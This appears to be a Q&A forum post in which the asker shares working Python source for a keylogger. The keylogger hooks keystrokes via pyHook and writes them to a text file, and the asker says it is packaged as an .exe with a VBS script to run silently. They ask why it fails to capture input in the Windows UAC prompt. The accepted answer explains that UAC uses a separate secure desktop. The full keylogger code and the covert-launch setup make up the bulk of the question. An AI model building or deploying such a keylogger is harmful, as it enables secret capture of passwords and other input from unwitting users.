# Python keylogger does not log UA prompt keystrokes

Tags: python, windows, admin, keylogger

I am making a simple keylogger in Python. It was turned into an `.exe` file by putting all the necessary stuff into a `rar` and additionally creating a `vbs` to run it silently. It records all input and stores it in a `txt` file once it's terminated via Task Manager. I was testing what it could do and I noticed it did not record any input in the windows UA prompt **(And of course this was not my actual intent)**. I was wondering why this happens. Thanks in advance.

Here you can view the keylogger code:

```
import pyHook, pythoncom, sys, logging

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Answer (score 1, accepted):

A keyboard hook can observe keyboard input only in the desktop where it's installed. The UAC prompt is displayed in a dedicated, secure desktop.

Comment: Thank you, I was looking for that answer.

Comment: @Mujtaba The solution to what problem?